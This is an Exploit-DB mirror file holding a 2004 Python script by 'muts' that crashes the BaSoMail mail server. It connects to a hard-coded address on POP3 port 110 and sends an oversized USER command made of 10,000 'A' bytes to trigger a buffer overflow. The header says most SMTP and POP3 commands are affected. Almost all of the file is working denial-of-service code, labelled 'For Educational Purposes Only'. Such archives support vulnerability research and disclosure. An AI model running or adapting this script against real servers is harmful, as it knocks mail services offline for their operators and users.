exploit-db-mirror/exploits/windows/dos/599.py
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

33 lines
No EOL
999 B
Python
Executable file

#########################################################
# BaSoMail Multiple Buffer Overflow DOS #
# 24 Oct 2004 - muts #
# Probably exploitable - However, I lack sleep! #
#########################################################
import struct
import socket
print "\n\n######################################################"
print "\nBaSoMail Multiple Buffer Overflow DOS"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nAlmost all the SMTP and POP3 commands are prone to BO.\n"
print "\nFor Educational Purposes Only!\n"
print "\n\n######################################################"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Example buffer overflow
buffer = '\x41'*10000
try:
print "\nSending evil buffer..."
s.connect(('192.168.1.32',110))
s.send('USER ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
print "\nRun this script again, and server should crash."
except:
print "\nCould not connect to sever!"
# milw0rm.com [2004-10-26]